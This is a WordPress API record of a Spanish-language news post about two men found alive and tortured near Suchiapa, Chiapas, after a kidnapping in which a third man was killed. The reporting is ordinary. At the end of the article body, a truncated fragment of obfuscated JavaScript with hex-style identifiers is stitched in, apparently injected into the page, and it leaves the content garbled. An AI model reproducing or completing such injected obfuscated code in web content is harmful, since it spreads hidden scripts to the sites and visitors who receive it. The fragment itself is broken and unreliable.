{"id":21188,"date":"2025-04-01T02:56:16","date_gmt":"2025-04-01T02:56:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21188"},"modified":"2025-04-01T02:56:16","modified_gmt":"2025-04-01T02:56:16","slug":"fueron-localizados-los-dos-jovenes-levantdos-en-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21188","title":{"rendered":"Fueron localizados los dos j\u00f3venes levant@dos en Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027-1024x768.jpg\" alt=\"\" class=\"wp-image-21189\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250331-WA0027.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 31 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la madrugada fueron localizados con vida los dos hombres que fueron lev@nt@dos en el municipio de Suchiapa el d\u00eda s\u00e1bado.<\/p>\n\n\n\n<p>De acuerdo con los reportes del caso, sujetos armados llegaron hasta un domicilio donde ej\u00fct4ron a uno y dos m\u00e1s fueron plagiados.<\/p>\n\n\n\n<p>Sobre la ubicaci\u00f3n se supo que fueron localizados a un costado del nuevo libramiento sur , los cuales estaban amordazados y portaban un mensaje de un presunto grupo delictivo.<\/p>\n\n\n\n<p>Tras una revisi\u00f3n m\u00e9dica se inform\u00f3 que presentaban huellas de tortura.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 31 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la madrugada fueron localizados con vida los dos hombres que fueron lev@nt@dos en el municipio de Suchiapa el d\u00eda s\u00e1bado. De acuerdo con los reportes del caso, sujetos armados llegaron hasta un domicilio donde ej\u00fct4ron a uno y dos m\u00e1s fueron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-21188","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21188"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21188\/revisions"}],"predecessor-version":[{"id":21190,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21188\/revisions\/21190"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}